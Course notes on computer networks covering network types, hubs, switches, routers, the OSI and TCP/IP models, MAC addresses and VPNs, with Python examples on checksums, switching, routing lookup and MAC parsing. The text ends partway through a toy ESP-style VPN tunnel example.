3 Networks

Networks allow for the connection and sharing of resources between devices. Modern networks can carry various types of data such as voice, video, and graphics. There are several types of networks including local area networks (LANs), wireless local area networks (WLANs), wide area networks (WANs), storage area networks (SANs), personal area networks (PANs), metropolitan area networks (MANs), and virtual local area networks (VLANs). The largest and most well-known network is the Internet, which connects countless computers globally.

Networks

• Networks are mainly important for communication and sharing information
• Early networks were limited to exchanging character-based information between interconnected computers
• Modern networks carry voice, music, video, text and graphics between different devices
• Instant messaging, blogs, podcasting, wikis, online gaming etc. depend on networks
• Computer network - a computer system which uses communications equipment to connect computers and their resources
Terms and Definitions
• Bus topology – Computer network in which all the devices are connected to a single shared cable (the bus)
• Cable – Copper wire (usually coaxial or twisted pair) or fibre optic cable (made from glass) used for connecting devices
• Check digit – Extra digit added to numerical data that is used to check data integrity after input, transmission, storage and processing
• Data integrity – The accuracy of data after input, transmission, storage or processing
• Checksum – Error-detecting value computed from the data being sent (for example a sum of its bytes or words), transmitted with the data and recomputed by the receiver; a mismatch signals corruption
• Data packet – Portion of a message that is transmitted through a network; the fundamental unit of transmission. Has a defined format and carries header fields such as the destination address and a check value alongside the data
• Gateway – Link that resides between computer networks and is responsible for converting data passing through into the appropriate format so it can be understood by the receiving network
Terms and Definitions
• Handshaking – Exchange of predetermined signals to signify that a connection has been established between two systems
• Hub – Network connection point for devices. Data arriving at a hub is copied and sent to all the devices on the network
• ISDN (Integrated Services Digital Network) – International communications standard that allows for the transmission of audio, video and other data over digital telephone lines
• LAN – Computer network where all the connected computers are within a limited geographical area. Connections between the computers may be through cables or wireless/microwave links
• Microwave transmission – Line-of-sight transmission between towers carrying antennas
• Modem – Electronic equipment that converts digital computer signals into analog signals and vice versa. The analog signals are transmitted over telephone lines, which allows for distant communication.
Terms and Definitions
• Network – Computer systems that are interconnected to share resources and data
• Packet – Group of bits. May include control signals, error-control bits and coded information as well as the destination
• Packet switching – Network communication method that creates and transmits small units of data called packets through a network independently of the overall message
• Parity bit – Error-detecting procedure that appends a binary digit to a group of bits so that the number of 1 bits is even (or odd); the receiver recomputes it to check the data after input, transmission, storage or processing. It catches any odd number of flipped bits but misses an even number
• Protocol – An agreed set of rules governing how data is exchanged between systems. A protocol that is recognized as the standard for a specific type of transfer is called a standard protocol, e.g. TCP/IP (Transmission Control Protocol / Internet Protocol, used to connect hosts on the Internet)
• WAN – Computer network where the connected computers are spread over a large geographical area
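The parity bit and checksum definitions above describe what a receiver does; the following is an added example (not part of the original slides) that implements an even parity bit and the RFC 1071 Internet checksum used in IPv4, TCP and UDP headers, then feeds each check a clean copy of the data, a single-bit error, and a pair of compensating bit errors. The sample bytes and the flipped bit positions are constructed for the demonstration.

```python
"""Parity bit and Internet checksum (added example; not from the original slides).

even_parity_bit() is the classic single parity bit; internet_checksum() is the
RFC 1071 one's-complement checksum that IPv4, TCP and UDP headers carry.
The sample data and the bit positions flipped are constructed for the demo.
"""


def even_parity_bit(data: bytes) -> int:
    """Bit that makes the number of 1 bits in data plus the parity bit even."""
    ones = sum(bin(b).count("1") for b in data)
    return ones & 1


def parity_check(data: bytes, stored_parity: int) -> bool:
    """Receiver side: recompute the parity bit and compare with the stored one."""
    return even_parity_bit(data) == stored_parity


def internet_checksum(data: bytes) -> int:
    """RFC 1071: one's-complement sum of all 16-bit words, then complemented."""
    if len(data) % 2:
        data += b"\x00"  # odd-length input is padded with a zero byte
    total = 0
    for i in range(0, len(data), 2):
        total += (data[i] << 8) | data[i + 1]
        total = (total & 0xFFFF) + (total >> 16)  # end-around carry
    return (~total) & 0xFFFF


def checksum_check(data: bytes, stored_checksum: int) -> bool:
    """Receiver side: recompute over the received data and compare."""
    return internet_checksum(data) == stored_checksum


def flip_bit(data: bytes, bit_index: int) -> bytes:
    """Simulate a transmission error: flip bit `bit_index` (bit 0 = LSB of byte 0)."""
    out = bytearray(data)
    out[bit_index // 8] ^= 1 << (bit_index % 8)
    return bytes(out)


# Constructed sample payload: byte 0 has its LSB set, byte 2 has its LSB clear.
SAMPLE = bytes([0x11, 0x22, 0x10, 0x44])


def error_detection_report(data: bytes = SAMPLE) -> dict:
    """Run three receive scenarios and report which checks notice the error.

    'compensating' flips two bits at the same position of two different words
    (one 1->0, one 0->1): the bit count and the word sum are unchanged, so
    neither a parity bit nor the Internet checksum can detect it.
    """
    parity = even_parity_bit(data)
    csum = internet_checksum(data)
    scenarios = {
        "clean": data,
        "single_flip": flip_bit(data, 3),
        "compensating": flip_bit(flip_bit(data, 0), 16),
    }
    return {
        name: {
            "parity_ok": parity_check(received, parity),
            "checksum_ok": checksum_check(received, csum),
        }
        for name, received in scenarios.items()
    }


if __name__ == "__main__":
    for name, result in error_detection_report().items():
        print(f"{name:13s} parity_ok={result['parity_ok']} checksum_ok={result['checksum_ok']}")
```

The compensating case is the point worth remembering: both checks are linear, so an error that adds as much as it removes passes unnoticed. They catch random line noise, not deliberate modification, which is why integrity against an attacker needs a keyed MAC rather than a checksum.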
Network Devices
• Server
– It can be a computer system or a software application that provides
a service to the other systems connected to the same network
– Host running server software applications and sharing its resources
with clients
– Server waits for requests from clients
– File Server, Database server
• Client
– It can be a computer system or a software application that requests
a service from the server connected to the same network
– It does not share any of its resources but requests content from the
server.
– Email client
Network Devices
• Hub
– Connection point for devices on a single network
– Systems connect to the hub using an Ethernet cable via a port
– A hub contains multiple ports
– When a network device wishes to send data to some other device on the network, it sends the data to the hub
– The hub copies the data and sends it to all devices connected to its ports
– The device the data is addressed to accepts it (all other devices ignore it)
– A lot of traffic is generated on the network, since all the other ports that just ignore the data still have to receive it
– This slows down the network
– Because every port receives every frame, any device on a hub can capture the traffic of all the others; a hub provides no isolation against sniffing
Network Devices
• Switch
– A switch is also the connection point for multiple devices on a single network
– However, a switch learns which device (MAC address) is connected to which port by looking at the source address of the frames it receives
– This allows the switch to transmit data only to the port and network device for which it is intended
– Networks connected with a switch are faster than networks connected with hubs, and a device normally sees only its own traffic (plus broadcasts and frames to addresses the switch has not yet learned)
Network Devices
• Router
– More sophisticated than a hub or switch
– Its use is to join multiple networks and serve as an intermediary between these networks so that data can be exchanged effectively and efficiently
– Example - a router is used to connect a home computer to the Internet
– In home equipment the switch, wireless access point and router functions are often integrated into a single box
Note - A LAN provides the nodes connected to it with direct (Layer 2) access to one another. It is usually comprised of one or more Ethernet switches. Computers on different LANs talk to each other using Layer 3 (IP), via a router.
The most important difference between them is that a switch bases its forwarding decision on a layer 2 address (in Ethernet this is the MAC address) whereas a router uses the layer 3 address (the IP address). So basically switches care about MAC addresses and routers about IP addresses. The router is therefore the first point at which traffic between two LANs can be filtered.
Characteristics of Internet
• Collection of countless types of computers
and networks connected together
• WWW, email, file transferring are services that
are built on internet
• No centralized control but governments have
the power to restrict what citizens in their
countries can access.
• ISPs can also restrict access to specific sites
Different types of networks
• Local Area Network (LAN) : A small group of computers
connected, usually over a very small area - a single room,
small offices or a building. Usually connected with copper
cables, Ethernet.
• Usually have high data transfer rates
• Client - Server mode of operation is used
• LANs allow sharing of peripheral devices (printers,
scanners, external hard drives) – eliminates the need to
buy peripheral devices for every computer
• Another benefit is Data sharing. Exchange of data between
clients increases flexibility and reduces wastage of time
• Hub / Switch with Ethernet cabling
Different types of networks
• Wireless LAN (WLAN): provides connectivity to wireless devices within a limited geographic area.
• Same as a LAN, just with radio wave connections (WiFi) instead of wires.
• Mobiles, laptops can be connected
• In general slower than a wired LAN.
• WLANs can be less secure than wired LANs: if the wireless signal is strong enough, the network can be reached from outside the premises, so the link itself must authenticate clients and encrypt traffic rather than relying on physical access control
Different types of networks
• Virtual Local Area Network (VLAN):
• A group of network devices that are on the same physical LAN but are partitioned into separate logical LANs.
• A VLAN might comprise a subset of the ports on a single switch or subsets of ports on multiple switches.
• By default, systems on one VLAN don't see the traffic (including broadcasts) of systems on other VLANs on the same switches.
• Traffic between VLANs has to pass through a router (or layer-3 switch), which is where filtering between them can be enforced.
• VLANs allow network administrators to partition their networks to match the functional and security requirements of their systems
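To make the hub/switch difference from the Network Devices slides and the VLAN partitioning above concrete, here is an added example (not from the slides) that simulates both devices in Python. Port numbers, VLAN assignments and the 02:… MAC addresses are constructed; the forwarding rules are the ones a real learning bridge applies.

```python
"""Hub flooding versus a learning switch with VLANs (added example; not from the slides).

Port numbers, VLAN assignments and MAC addresses below are constructed. The
switch models what a real layer-2 bridge does: it learns which (VLAN, MAC)
pair sits behind which port from the *source* address of each frame, forwards
known unicast to exactly one port, and floods unknown unicast and broadcast
only to the other ports in the same VLAN.
"""
from dataclasses import dataclass
from typing import Dict, List, Tuple

BROADCAST = "ff:ff:ff:ff:ff:ff"


@dataclass(frozen=True)
class Frame:
    src: str
    dst: str
    payload: bytes = b""


class Hub:
    """Repeats every frame to every other port: no learning, no isolation."""

    def __init__(self, ports: List[int]):
        self.ports = set(ports)

    def forward(self, in_port: int, frame: Frame) -> List[int]:
        return sorted(self.ports - {in_port})


class Switch:
    """Learning bridge with port-based VLANs."""

    def __init__(self, port_vlan: Dict[int, int]):
        self.port_vlan = dict(port_vlan)                  # access port -> VLAN id
        self.mac_table: Dict[Tuple[int, str], int] = {}   # (vlan, mac) -> port

    def forward(self, in_port: int, frame: Frame) -> List[int]:
        vlan = self.port_vlan[in_port]
        # Learning: the source MAC was just seen on in_port within this VLAN.
        self.mac_table[(vlan, frame.src)] = in_port
        if frame.dst != BROADCAST:
            out = self.mac_table.get((vlan, frame.dst))
            if out == in_port:
                return []          # destination is on the same segment: filter it
            if out is not None:
                return [out]       # known unicast: one port only
        # Unknown unicast or broadcast: flood, but only inside this VLAN.
        return sorted(p for p, v in self.port_vlan.items()
                      if v == vlan and p != in_port)


# Constructed topology: ports 1-2 in VLAN 10, ports 3-4 in VLAN 20.
PORT_VLAN = {1: 10, 2: 10, 3: 20, 4: 20}
MAC_A, MAC_B, MAC_C = "02:00:00:00:00:0a", "02:00:00:00:00:0b", "02:00:00:00:00:0c"


def sniffer_sees_conversation(device) -> bool:
    """Does a sniffer on port 4 receive any frame of an A<->B exchange on ports 1 and 2?"""
    exchange = [(1, Frame(MAC_A, MAC_B)), (2, Frame(MAC_B, MAC_A)), (1, Frame(MAC_A, MAC_B))]
    return any(4 in device.forward(port, frame) for port, frame in exchange)


if __name__ == "__main__":
    sw = Switch(PORT_VLAN)
    print("first frame A->B floods VLAN 10 only:", sw.forward(1, Frame(MAC_A, MAC_B)))
    print("reply B->A goes to the learned port:", sw.forward(2, Frame(MAC_B, MAC_A)))
    print("sniffer on port 4 sees A<->B via hub:", sniffer_sees_conversation(Hub([1, 2, 3, 4])))
    print("sniffer on port 4 sees A<->B via switch:", sniffer_sees_conversation(Switch(PORT_VLAN)))
```

Two details matter for security: the first frame to a not-yet-learned destination is still flooded to every port in the VLAN, so a sniffer in the same VLAN sees it, and the table is learned from unauthenticated source addresses, so a host sending frames with another host's MAC pulls that host's traffic to its own port. VLANs only separate what the switch's own table separates; they are not a substitute for a firewall between segments.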
Different types of networks
• Metropolitan Area Network (MAN): Network over a larger area, usually city-size, connecting computers and LANs. Often built with fibre optics as high speeds are required.
• Wide Area Network (WAN): Network over large geographical areas, often across and beyond continents. The best-known WAN is the Internet. Various transmission media, like phone cables, fibre optics and satellite links, are used. Connects many computers, LANs or other WANs.
Different types of networks
• Storage Area Network (SAN) – is a high-speed
network of storage devices that also connects
these devices with servers.
• Examples of storage devices – disk arrays, tape
libraries
Different types of networks
• Personal Area Network (PAN) – A short-range network of personal devices, such as cell phones, tablets and audio headsets, often using Bluetooth or other short-range radio.
• Interconnects devices that are centred around an individual person's workspace.
• Effectively a LAN that serves only one person
• Very short range, typically up to 10 m
• Mobile, laptop and tablet interconnected and sharing data such as emails, calendars, photos
• Wired (through USB) or wireless (through a Bluetooth piconet)
Different types of networks
• Internet
• The ultimate wide area network spanning the entire globe; a vast collection of smaller networks.
• Services – WWW, email, file transfer
• Not owned by any entity, not centrally administered
• Decentralized design – resources are spread out, no single server
• Access to the Internet is provided by an ISP (Internet Service Provider)
• Intranets
• An intranet is a set of networks that are under the control of a single administrative entity.
• The intranet uses the IP protocol and IP-based tools such as web browsers and file transfer applications.
• The administrative entity limits use of the intranet to its authorized users.
• Most commonly, an intranet is the internal LAN of an organization.
• Purpose - communication and data sharing
• If an intranet is connected to the Internet, a firewall is used to protect it
Different types of networks
• Extranet
• An extranet is a network that is also under the administrative control of a single organization, but supports a limited connection to a specific external network.
• For example, an organization may provide access to some aspects of its intranet to share data with its business partners or customers.
• These other entities are not necessarily trusted from a security standpoint.
• A firewall controls the access rights and allows access to the intranet only to the people who are authorized
• Features
• An external extension to a company's local network;
• Limited access;
• Uses Internet protocols;
Different types of networks
• Virtual Private Network
– Computer network that connects two or more computer systems but also allows clients in remote locations to connect to the network and appear to be inside the LAN
– A VPN allows creation of a LAN to which clients can connect from a remote location, even through a different network
– A VPN has all the benefits of a LAN, allowing users to share data and resources without compromising security
– A VPN can securely and cost-effectively connect geographically disparate offices of a business into one network with all the functionality of a LAN
• Example 1: A business can let employees working at home, employees who travel a lot, or external (non-employee) users access the data and services at the office via a secure login
• Example 2: Using a VPN, the user's own address is masked from the sites they visit, so their location is not revealed to those sites (the VPN provider, however, still sees it). This may be essential in delicate situations such as political protest groups working from their own country
Different types of networks
• Peer to Peer (P2P)
• A peer-to-peer (P2P) network is created when two or more PCs are connected and share resources without going through a separate server computer.
• A P2P network can be an ad hoc connection - a couple of computers connected via a Universal Serial Bus to transfer files.
• A P2P network can also be a permanent infrastructure that links a half-dozen computers in a small office over copper wires
• Distributed, decentralized network architecture where nodes are both clients and servers at the same time
• Features
– No central server;
– Resources are more widely available (storage, bandwidth, computing power);
– Redundancy/recovery;
– Supports file sharing for collaborative work;
Different types of networks
• Internet of Things
• Network of individual things that are able to connect to the Internet, communicate and exchange data
• Each thing carries the necessary hardware and software and has a network address (typically an IP address)
• Some ways to connect to the Internet
– Broadband access via DSL or cable modem
– WiFi access
– Dial-up access via modem
– Mobile networks (3G, 4G)
• Globalization has been accelerated by the technical advances linked to network development.
Importance of standards in the construction of networks
• Standards enable compatibility through a common "language" internationally.
• They allow interoperability and compatibility among different computer hardware and software.
• They provide a set of rules so that networks function properly throughout the world, including in countries that may not have access to advanced technology but still have to reach the worldwide network.
a) International Organization for Standardization (ISO)
b) International Telecommunication Union (ITU)
c) American National Standards Institute (ANSI)
d) Institute of Electrical and Electronics Engineers (IEEE)
e) Electronic Industries Alliance (EIA)
f) Internet Engineering Task Force (IETF)
Networks, Communication and Layers
• Different computer system manufacturers
• Hardware differs, software differs, yet systems still need to communicate
• Standards came into place
• Communication is organised in different layers (each layer uses different protocols)
• A software application in one system creates some data to be sent to another software application in another system
• The data format must be understandable by both applications
• Data is encoded before being passed on to the network
• Data is broken up into packets, each with a destination address
• Packets travel through the network (routing protocols)
• Only signals representing 1s and 0s travel over the medium
• Finally the receiving application reassembles the data
Networks, Communication and Layers
• Advantages of Layers
– Easy to manage
– Greater understanding of each layer
– Common language for each layer
– Makes protocol design easier
– A manufacturer can focus on technologies of a particular layer
– Products of different manufacturers can work together
– When changes are made to one layer, the impact on the
other layers is minimized.
– Enables troubleshooting efforts to be pinpointed on the layer
that carries out the suspected cause of the problem
– Technology advances of a layer are independent of
technology advancements of other layers
Communication over networks is broken down into different layers (OSI model)
• The OSI reference model is the standard vocabulary for describing how computer communication networks work; real networks are built on TCP/IP but are described and compared in OSI terms.
• Established by ISO (International Organization for Standardization)
• The aim of the OSI model is to allow communication across many different technical platforms and to allow easy development.
• To reach this, the model defines seven consecutive layers with individual roles.
• The OSI is a standardized system/model for network connection; it consists of 7 layers, each dealing with specific parts of network communication; for example the physical layer defines the physical connection.
OSI
• Layer 7 - Application layer:
• This layer provides functions for the applications
running on a computer. Data input and output
happens over this layer.
• Examples of common functions include:
– Protocols for providing remote file services, such as open,
close, read, write, and shared access to files
– File transfer services and remote database access
– Message handling services for electronic mail applications
– Global directory services to locate resources on a network
– A uniform way of handling a variety of system monitors and
devices
– Remote job execution
OSI
• Layer 6 - Presentation layer:
• This layer handles the system-specific representation of data (e.g. character encodings such as ASCII).
• It enables the correct exchange of data between different systems.
• Data compression and encryption are also traditionally placed in this layer.
• In general, it ensures that data sent by the application layer of one system can be read by the application layer of the receiving system.
• If necessary, it works as a translation layer between the different data formats used by the two systems.
• Layer 5 - Session layer:
• This layer sets up, coordinates and terminates conversations. Services include authentication and reconnection after an interruption.
• The term session refers to a connection for data exchange between two parties
• If a communication session is broken, the session layer determines where to restart the transmission once the session has been reconnected
• This layer is also responsible for determining the terms of the communication session
• Layer 4 - Transport layer:
• Functions of this layer include splitting the data stream into segments, reassembling them in order using sequence numbers, acknowledgements, error detection (checksums) with recovery by retransmission, and flow control. TCP provides all of these; UDP provides only a checksum, with no ordering, acknowledgement or retransmission.
OSI
• Layer 3 - Network Layer:
• In packet-oriented networks, this layer is responsible for the forwarding of data packets.
• Data forwarding happens over the entire network and includes the routing of packets between the network nodes.
• The network layer of the OSI model is responsible for managing logical addressing information in the packets and the delivery of those packets to the correct destination.
• Routers, which are special computers used to build the network, direct the data packets generated by the network layer using information stored in a table known as the routing table.
• The routing table is a list of available destinations (prefixes) stored in memory on the routers; for each packet the router picks the most specific matching entry.
• The logical address is used by network layer protocols to deliver the packets to the correct network.
• The logical addressing system used in the network layer is the IP address; IP addresses are also known as logical addresses or layer 3 addresses.
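The routing-table lookup described above is a longest-prefix match. The following added example (not from the slides) implements it with Python's ipaddress module over a constructed table: a directly connected /16, an aggregate /8 behind a core router, and a default route. The next-hop addresses are from the RFC 5737 documentation ranges and are placeholders.

```python
"""Longest-prefix-match lookup in a routing table (added example; not from the slides).

Routes and destinations are constructed; next hops use RFC 5737 documentation
addresses. The table keeps routes sorted by prefix length so the first match is
the most specific one, which is how a router's forwarding decision works.
"""
import ipaddress
from dataclasses import dataclass
from typing import List, Optional


@dataclass(frozen=True)
class Route:
    prefix: ipaddress.IPv4Network
    next_hop: Optional[str]   # None means the destination is directly connected
    interface: str


class RoutingTable:
    def __init__(self) -> None:
        self.routes: List[Route] = []

    def add(self, prefix: str, next_hop: Optional[str], interface: str) -> None:
        """Add a route; `prefix` like '10.1.0.0/16', or '0.0.0.0/0' for the default route."""
        self.routes.append(Route(ipaddress.ip_network(prefix), next_hop, interface))
        # Most specific first, so lookup() can stop at the first containing prefix.
        self.routes.sort(key=lambda r: r.prefix.prefixlen, reverse=True)

    def lookup(self, destination: str) -> Optional[Route]:
        """Return the longest-prefix route for `destination`, or None if unroutable."""
        addr = ipaddress.ip_address(destination)
        for route in self.routes:
            if addr in route.prefix:
                return route
        return None

    def explain(self, destination: str) -> str:
        route = self.lookup(destination)
        if route is None:
            return f"{destination}: no route (dropped)"
        via = "directly connected" if route.next_hop is None else f"via {route.next_hop}"
        return f"{destination}: matched {route.prefix} -> {via} on {route.interface}"


def build_sample_table() -> RoutingTable:
    """Constructed enterprise-style table: one directly connected LAN, an
    aggregate for the rest of 10/8 behind a core router, and a default route."""
    table = RoutingTable()
    table.add("10.1.0.0/16", None, "eth0")          # our own LAN
    table.add("10.0.0.0/8", "10.1.0.1", "eth0")      # other internal sites via the core
    table.add("0.0.0.0/0", "203.0.113.1", "eth1")    # default route towards the ISP
    return table


if __name__ == "__main__":
    table = build_sample_table()
    for dst in ("10.1.2.3", "10.2.0.1", "198.51.100.7"):
        print(table.explain(dst))
```

Because the most specific prefix always wins, a route injected for a smaller prefix silently captures traffic from a legitimate larger one; that is the mechanism behind prefix hijacks, and a reason to filter which prefixes each routing peer is allowed to announce.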
OSI
• Layer 2 - Data Link layer:
• The task of this layer is to ensure a faultless transmission of data and to regulate access to the transmission medium, by breaking up the bit stream into frames and providing them with a frame check sequence (a CRC) so that a corrupted frame can be detected.
• The data link layer is logically divided into two sublayers, the Media Access Control (MAC) sublayer and the Logical Link Control (LLC) sublayer.
• The Media Access Control (MAC) sublayer determines the physical addressing of the hosts.
• The Logical Link Control (LLC) sublayer helps to communicate with the upper-level layers.
• The MAC sublayer maintains MAC addresses (physical device addresses) for communicating with other devices on the network.
• MAC addresses are burned into the network cards and constitute the low-level address used to determine the source and destination of network traffic. Most drivers nevertheless allow the address to be overridden in software, so a MAC address identifies an interface but does not authenticate it.
• MAC addresses are also known as physical addresses, layer 2 addresses, or hardware addresses.
• The Logical Link Control sublayer is responsible for synchronizing frames (indicating the beginning and end of data), error checking, and flow control (transmission rate according to the receiver buffer).
MAC address format

A MAC address is 48 bits, written as 12 hexadecimal digits (e.g. six pairs separated by colons). The first six hexadecimal digits (24 bits), which are administered by the IEEE, identify the manufacturer or vendor. The remaining six hexadecimal digits comprise the interface serial number assigned by that vendor.
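An added example (not from the slides) that decodes a MAC address in the three notations commonly seen (colon, hyphen, Cisco dotted) into the IEEE-assigned and vendor-assigned halves, plus the two flag bits in the first octet that the vendor/serial split above leaves out. The addresses in the demo are constructed; mapping an OUI to a vendor name needs the IEEE registry, which is not embedded here.

```python
"""Decode a MAC address into its IEEE-assigned and interface-specific halves
(added example; not from the slides). The addresses used are constructed;
02:xx addresses are locally administered (the kind VM hosts and containers
generate) and 01:00:5e:... is the IPv4 multicast prefix.
"""
import re

_MAC_FORMS = re.compile(
    r"^(?:[0-9a-f]{2}[:-]){5}[0-9a-f]{2}$"   # 00:1a:2b:3c:4d:5e or 00-1a-2b-3c-4d-5e
    r"|^(?:[0-9a-f]{4}\.){2}[0-9a-f]{4}$"    # 001a.2b3c.4d5e (Cisco style)
    r"|^[0-9a-f]{12}$"                        # bare hex
)


def parse_mac(text: str) -> dict:
    """Return the OUI, the interface part and the two flag bits of the first octet.

    Raises ValueError for anything that is not a 48-bit MAC in a known notation.
    """
    s = text.strip().lower()
    if not _MAC_FORMS.match(s):
        raise ValueError(f"not a MAC address: {text!r}")
    octets = bytes.fromhex(re.sub(r"[^0-9a-f]", "", s))
    first = octets[0]
    return {
        "canonical": ":".join(f"{b:02x}" for b in octets),
        "oui": octets[:3].hex().upper(),            # first 24 bits: IEEE-assigned vendor block
        "interface_id": octets[3:].hex().upper(),   # last 24 bits: chosen by the vendor
        # Bit 0 of the first octet: 0 = unicast, 1 = group (multicast/broadcast).
        "multicast": bool(first & 0x01),
        # Bit 1 of the first octet: 0 = universally administered (vendor-burned),
        # 1 = locally administered, i.e. set by software, not an IEEE OUI.
        "locally_administered": bool(first & 0x02),
    }


def is_mac(text: str) -> bool:
    """Validation helper: True if parse_mac() accepts the string."""
    try:
        parse_mac(text)
        return True
    except ValueError:
        return False


def is_trustworthy_vendor_id(mac: str) -> bool:
    """True only if the OUI is meaningful: unicast and universally administered.
    A locally administered address says nothing about the hardware vendor."""
    info = parse_mac(mac)
    return not info["multicast"] and not info["locally_administered"]


if __name__ == "__main__":
    for mac in ("00-1A-2B-3C-4D-5E", "001a.2b3c.4d5e", "02:42:ac:11:00:02",
                "01:00:5e:00:00:01", "ff:ff:ff:ff:ff:ff"):
        print(mac, parse_mac(mac))
```

The locally-administered bit is the practical check: a 02:… address was generated by software (virtual machines, containers, randomised Wi-Fi addresses), so its "vendor" half identifies nothing, and an asset inventory or access-control rule keyed on OUI should treat such addresses accordingly.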
OSI
• Layer 1 - Physical layer:
• This is the lowest layer.
• The physical layer is limited to the processes needed to place the communication signals onto the media, and to receive signals coming from that media.
• The lower boundary of the physical layer of the Open Systems Interconnection (OSI) model is the physical connector attached to the transmission media.
• The physical layer does not include the transmission medium itself and does not provide any sort of error correction.
• The Physical Layer defines:
– Physical network structures
– Mechanical and electrical specifications for using the transmission medium
– Bit transmission encoding and timing rules
• However, implementations of physical protocols are transmission-media-specific
• The following network connectivity hardware is normally associated with the OSI physical layer:
– Network interface boards (NICs, adaptors, and so on)
– Hubs and repeaters that regenerate electrical signals
– Transmission media connectors, which provide the mechanical interface to interconnect devices to the transmission media (cables, BNC connectors, etc.)
– Modems and codecs, which perform digital/analogue conversions.
TCP/IP model
• Hierarchical model that represents all the functionality required for successful communication between the users
• 4 layers: application, transport, internet and network access (link)
SIMILARITIES
• They share a similar architecture. Both models are constructed from layers.
• They share a common application layer. However, in practice this layer includes different services depending on the model.
• Both models have comparable transport and network layers. The OSI transport layer corresponds to the TCP/IP transport layer, and the OSI network layer to the TCP/IP internet layer.
• Both models assume that packets are switched. Basically this means that individual packets may take differing paths in order to reach the same destination.
DIFFERENCES
• TCP/IP protocols are considered to be the standards around which the Internet has developed. The OSI model however is a "generic, protocol-independent standard."
• TCP/IP combines the presentation and session layer issues into its application layer.
• TCP/IP combines the OSI data link and physical layers into the network access layer.
• TCP/IP appears to be a simpler model, mainly because it has fewer layers.
• TCP/IP is considered to be the more credible model because its protocols are the standards around which the Internet was developed; networks are not usually built around the OSI model, which is used as a guidance tool.
• The OSI model consists of 7 architectural layers whereas TCP/IP has only 4.
Technologies required to provide a VPN
• A VPN (Virtual Private Network) handles and transfers data as if it were private, but over public networks.
• A VPN makes a tunnelled network connection through the Internet or any other public network. The technology used is IPsec with encryption, or TLS with encryption (SSL 3.0 and earlier are obsolete and must not be used).
• Tunnelling is the process of placing an entire packet within another packet before it is transported over the Internet. Encapsulation by itself hides nothing; the inner packet is encrypted and authenticated before it is wrapped, so the outer packet reveals only the tunnel endpoints and the packet travels within a virtual tunnel.
• To set up a VPN, you need:
– Client VPN software to make a secure remote connection
– VPN-aware routers and firewalls to permit legitimate VPN traffic to pass unhindered
– A VPN appliance/concentrator/server to handle and manage incoming VPN traffic, establish and manage VPN sessions and their access to network resources
– Internet access
VPN
• A VPN allows administrators to take advantage of the Internet in order to provide private WAN connectivity and security at low cost.
• The VPN is also part of a comprehensive network access solution which includes support for authorization and authentication services, as well as advanced network security technologies.
• VPN connections run a tunnelling protocol over an intermediate network, i.e. the Internet. Historically this was Point-to-Point Tunneling Protocol (PPTP) or Layer Two Tunneling Protocol over IPsec (L2TP/IPsec); PPTP's authentication and encryption are broken and it should no longer be deployed, whereas IPsec (with IKEv2) and TLS-based VPNs are current choices.
• A VPN saves the cost of long-distance telephone services and the hardware costs associated with dial-up or leased-line connections by using the Internet as the connection medium.
• Virtual private networks are point-to-point connections carried across private or public networks such as the Internet.
• VPN clients use special TCP/IP-based protocols (tunnelling protocols) to make a virtual call to a virtual port on a VPN server.
• In a typical VPN deployment, a client initiates a virtual point-to-point connection to a remote access server over the Internet.
• The remote access server answers the call, authenticates the caller, and transfers data between the VPN client and the organization's private network.
• It is possible for workers to connect to a company's internal network from almost anywhere in the world.
• This gave rise to home offices, as many office jobs do not require face-to-face consultation and hence can be completed from home.
• For example, a mother working half time as an accountant can bring her children to school in the morning, can then download the necessary papers from the company's network through a VPN and complete her work, and by the time she finishes, she can pick her kids up from school.
• This has saved a significant amount of time in her daily schedule that would otherwise have been spent travelling to and from work.
• Benefits
• Savings in fuel cost and commuting time; an opportunity to work at your own pace / more comfortably; increased productivity; an opportunity to work in an undisturbed environment; employees choose their own work hours; convenience of not having to travel;

• Problems
• Employers can claim the employees as part-time consultants or the like to avoid paying benefits like insurance, medical plans, taxes; the strain on families that results when a family member works at home; at-home employees miss interaction with co-workers at the office; at-home employees think they work too much, employers think they do not work enough; employers cannot monitor employees; expense of setting up a VPN;
VPN Encapsulation of Packets / VPN Basic Architecture (diagrams)
Working of a VPN
 Two connections – one is made to the Internet and the second is made to the VPN over it.
 Datagrams – contain the data plus destination and source information.
 Firewalls – VPNs allow authorized users to pass through the firewalls.
 Protocols – protocols create the VPN tunnels.
Four Critical Functions
Authentication – validates that the data really came from the claimed sender (and that the peer is who it claims to be).
Access control – prevents unauthorized users from accessing the network.
Confidentiality – prevents the data from being read or copied while it is being transported.
Data integrity – ensures that the data has not been altered in transit.
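The tunnelling description and the four functions above (authentication, access control, confidentiality, integrity) map directly onto the layout of an ESP packet. The following added example (not from the slides and not real IPsec) builds a miniature tunnel in Python: the inner packet is encrypted, an integrity check value is computed over the SPI, sequence number and ciphertext, and the result is wrapped in an outer header addressed between the two gateways. The cipher is an HMAC-SHA256 keystream standing in for AES, the anti-replay check is a window of one instead of the real 64-packet window, the outer header is a 9-byte stand-in for an IPv4 header, and the keys, addresses and inner packet are constructed.

```python
"""A miniature ESP-style VPN tunnel: encapsulate, encrypt-then-MAC, anti-replay
(added example; not from the slides and not real IPsec). The packet layout
follows ESP (SPI, sequence number, encrypted payload, ICV), but the cipher is
an HMAC-SHA256 keystream standing in for AES, the anti-replay check is a
window of one instead of 64, and the outer header is a 9-byte stand-in for an
IPv4 header. Keys, addresses (RFC 5737 ranges) and the inner packet are
constructed sample values.
"""
import hashlib
import hmac
import struct
from typing import Tuple

ESP_PROTO = 50   # IP protocol number carried in the outer header for ESP
ICV_LEN = 16     # truncated HMAC-SHA256 tag, as ESP does with HMAC-SHA256-128
ESP_HDR = struct.Struct("!II")        # SPI, sequence number
OUTER_HDR = struct.Struct("!4s4sB")   # src addr, dst addr, protocol (simplified)


def _keystream(key: bytes, spi: int, seq: int, n: int) -> bytes:
    """PRF-in-counter-mode keystream. (spi, seq) is the per-packet nonce, which
    is why a sequence number must never be reused under one key."""
    blocks = []
    ctr = 0
    while sum(len(b) for b in blocks) < n:
        blocks.append(hmac.new(key, struct.pack("!IIQ", spi, seq, ctr), hashlib.sha256).digest())
        ctr += 1
    return b"".join(blocks)[:n]


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


class EspTunnel:
    """One end of a tunnel; both ends are built with the same keys and SPI."""

    def __init__(self, enc_key: bytes, mac_key: bytes, spi: int, local: bytes, remote: bytes):
        self.enc_key, self.mac_key, self.spi = enc_key, mac_key, spi
        self.outer = OUTER_HDR.pack(local, remote, ESP_PROTO)
        self.send_seq = 0       # sender side
        self.highest_seen = 0   # receiver side

    def encapsulate(self, inner: bytes) -> bytes:
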